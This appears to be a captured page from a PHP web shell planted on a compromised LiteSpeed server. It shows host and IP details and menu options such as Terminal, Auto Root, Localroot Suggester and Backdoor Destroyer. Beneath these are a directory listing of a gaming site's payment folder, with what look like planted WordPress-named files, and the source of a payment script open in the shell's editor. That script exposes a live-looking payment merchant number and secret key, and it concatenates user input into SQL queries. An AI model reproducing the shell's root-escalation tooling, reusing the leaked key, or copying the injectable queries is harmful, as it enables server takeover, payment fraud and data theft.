Linux spg1.cloudpowerdns.com 5.14.0-611.34.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 18 05:51:10 EST 2026 x86_64
LiteSpeed
Server IP : 176.9.63.151 & Your IP : 216.73.217.60
Domains :
Cant Read [ /etc/named.conf ]
User : fastear1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
fastear1 /
game 61 clube /
pay /
Delete
Unzip
Name
Size
Permission
Date
Action
assets
[ DIR ]
drwxr-xr-x
2025-09-21 22:51
pay
[ DIR ]
drwxr-xr-x
2025-11-07 14:30
.htaccess
197
B
-r--r--r--
2026-04-01 03:43
adddeposit.php
4.52
KB
-rw-r--r--
2025-09-14 18:50
checksuccesspay.php
1.9
KB
-rw-r--r--
2025-09-14 18:50
config.php
371
B
-rw-r--r--
2025-11-21 17:38
depositconfirm.php
5.85
KB
-rw-r--r--
2025-09-14 18:50
error_log
788
B
-rw-r--r--
2025-11-23 10:38
heyrtnl.php
1.56
KB
-rw-r--r--
2025-09-14 18:50
jerrylawler.php
7.68
KB
-rw-r--r--
2025-11-21 17:37
lgwebhook.php
3.69
KB
-rw-r--r--
2025-09-14 18:50
log.txt
2.84
KB
-rw-r--r--
2025-11-07 17:53
otp.php
1
KB
-rw-r--r--
2025-09-14 18:50
safepay.php
6.64
KB
-rw-r--r--
2025-09-14 18:50
spwebhook.php
3.31
KB
-rw-r--r--
2025-09-14 18:50
usdt.php
22.48
KB
-rw-r--r--
2025-11-21 17:37
usdtconfim.php
5.67
KB
-rw-r--r--
2025-09-14 18:50
usdtuu.php
22.67
KB
-rw-r--r--
2025-09-14 18:50
wepay.php
4.66
KB
-rw-r--r--
2025-09-14 18:50
wepay2.php
4.73
KB
-rw-r--r--
2025-11-21 17:37
wp-blog-header.php
2.74
KB
-r--r--r--
2026-04-01 03:43
wp-cron.php
2.74
KB
-rw-r--r--
2026-04-01 03:43
Save
Rename
<?php header('Content-type: text/plain; charset=utf-8'); include ("../serive/samparka.php"); ?> <?php if(isset($_GET['amount'])){ $ramt = htmlspecialchars(mysqli_real_escape_string($conn, $_GET['amount'])); } else{ $ramt = 0; } // Format the amount to ensure two decimal places $dot_pos = strpos($ramt, '.'); if ($dot_pos === false) { $ramt = $ramt . '.00'; } else { $after_dot = substr($ramt, $dot_pos + 1); $after_dot_length = strlen($after_dot); if ($after_dot_length > 2) { $after_dot = substr($after_dot, 0, 2); $ramt = substr($ramt, 0, $dot_pos + 1) . $after_dot; } elseif ($after_dot_length < 2) { $zeros_to_add = 2 - $after_dot_length; $ramt = $ramt . str_repeat('0', $zeros_to_add); } } $date = date("Ymd"); $time = time(); $serial = $date . $time . rand(100000, 999900); $tyid = htmlspecialchars(mysqli_real_escape_string($conn, $_GET['tyid'])); $uid = htmlspecialchars(mysqli_real_escape_string($conn, $_GET['uid'])); $sign = htmlspecialchars(mysqli_real_escape_string($conn, $_GET['sign'])); $urlInfo = htmlspecialchars(mysqli_real_escape_string($conn, $_GET['urlInfo'])); // Check if `uid` exists in the `demo` table $demoQuery = "SELECT 1 FROM demo WHERE balakedara = '$uid'"; $demoResult = $conn->query($demoQuery); if ($demoResult->num_rows > 0) { // If uid exists in demo table, insert into `thevani` table and update `motta` $createdate = date("Y-m-d H:i:s"); // Insert into `thevani` $insertQuery = " INSERT INTO `thevani` (`balakedara`, `motta`, `dharavahi`, `mula`, `ullekha`, `duravani`, `ekikrtapavati`, `dinankavannuracisi`, `madari`, `pavatiaidi`, `sthiti`) VALUES ('$uid', '$ramt', '$serial', 'IndianPay', 'N/A', 'N/A', 'N/A', '$createdate', '1005', '2', '1') "; $conn->query($insertQuery); // Update `motta` field in `shonu_kaichila` $updateQuery = " UPDATE `shonu_kaichila` SET `motta` = `motta` + $ramt WHERE `balakedara` = '$uid' "; $conn->query($updateQuery); // Redirect to recharge history header('Location: https://92pak.shop/#/main'); exit; } // If not found in `demo` table, proceed with the rest of the existing logic $res = [ 'code' => 405, 'message' => 'Illegal access!', ]; if (isset($_GET['tyid']) && isset($_GET['amount']) && isset($_GET['uid']) && isset($_GET['sign']) && isset($_GET['urlInfo'])) { $userId = $uid; $userPhoto = '1'; $numquery = "SELECT mobile, codechorkamukala FROM shonu_subjects WHERE id = ".$userId; $numresult = $conn->query($numquery); $numarr = mysqli_fetch_array($numresult); $userName = '91'.$numarr['mobile']; $nickName = $numarr['codechorkamukala']; $creaquery = "SELECT createdate FROM shonu_subjects WHERE id = ".$userId; $crearesult = $conn->query($creaquery); $creaarr = mysqli_fetch_array($crearesult); $knbdstr = '{"userId":'.$userId.',"userPhoto":"'.$userPhoto.'","userName":'.$userName.',"nickName":"'.$nickName.'","createdate":"'.$creaarr['createdate'].'"}'; $shonusign = strtoupper(hash('sha256', $knbdstr)); $urlarr = explode (",", $urlInfo); $theirurl = $urlarr[0]; $myurl = 'https://92pak.shop'; if($shonusign == $sign && $theirurl == $myurl){ $orderid = $serial; $amount = htmlspecialchars(mysqli_real_escape_string($conn, $_GET['amount'])); $name = 'TestName'; $email = 'testemail@gmail.com'; $mobile = $numarr['mobile']; $remark = 'remark'; $type = 2; $notify_url = "https://92pak.shop/pay/spwebhook.php"; if (!$ramt || !$serial) { die("Error: Amount or order ID not provided."); } $apiUrl = "https://api.pnsafepay.com/gateway.aspx"; $merchantNumber = "1084227"; $secretKey = "cece4f8da6616231e8c5464319306b7e"; $data = [ "currency" => "INR", "mer_no" => $merchantNumber, "method" => "trade.create", "order_amount" => $amount, "order_no" => $orderid, "payemail" => "testuser@email.com", "payname" => "Test User", "payphone" => "9876543210", "paytypecode" => "11003", "returnurl" => $notify_url, ]; $dataForSignature = array_filter($data, function($value) { return $value !== null && $value !== ''; }); ksort($dataForSignature); $queryString = urldecode(http_build_query($dataForSignature)); $signatureString = $queryString . $secretKey; $data['sign'] = md5($signatureString); $jsonData = json_encode($data); $ch = curl_init($apiUrl); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $jsonData); curl_setopt($ch, CURLOPT_HTTPHEADER, [ 'Content-Type: application/json', 'Content-Length: ' . strlen($jsonData) ]); $response = curl_exec($ch); if (curl_errno($ch)) { echo "Error: " . curl_error($ch); } else { // Decode the JSON response $responseData = json_decode($response, true); // Check if the response contains the payment URL if ($responseData && isset($responseData['order_data'])) { $amt = $amount; $srl = $serial; $source = 'SG-pay'; $ref_num = $un['order_id']; $emailQ = mysqli_query($conn , "SELECT mobile FROM `shonu_subjects` WHERE `id` = '".$uid."'"); $emailA = mysqli_fetch_array($emailQ); $email = $emailA['mobile']; $upi = 'IndianPayUPI'; $createdate = date("Y-m-d H:i:s"); // Insert payment record into `thevani` $deposit1 = mysqli_query($conn, "INSERT INTO `thevani`(`balakedara`, `motta`, `dharavahi`, `mula`, `ullekha`, `duravani`, `ekikrtapavati`, `dinankavannuracisi`, `madari`, `pavatiaidi`, `sthiti`) VALUES('$uid', '$amount', '$srl', '$source','$ref_num', '$email', '$upi', '$createdate', '1005', '2', '0')"); header('Location: ' . $responseData['order_data']); exit; } else { // If there's an error, display an appropriate message echo "Error: Unable to process payment."; var_dump($response); } } curl_close($ch); } else { $res['code'] = 10000; $res['success'] = 'false'; $res['message'] = 'Sorry, The system is busy, please try again later!'; header('Content-Type: text/html; charset=utf-8'); http_response_code(200); echo json_encode($res); } } else { header('Content-Type: application/json; charset=utf-8'); http_response_code(200); echo json_encode($res); } ?>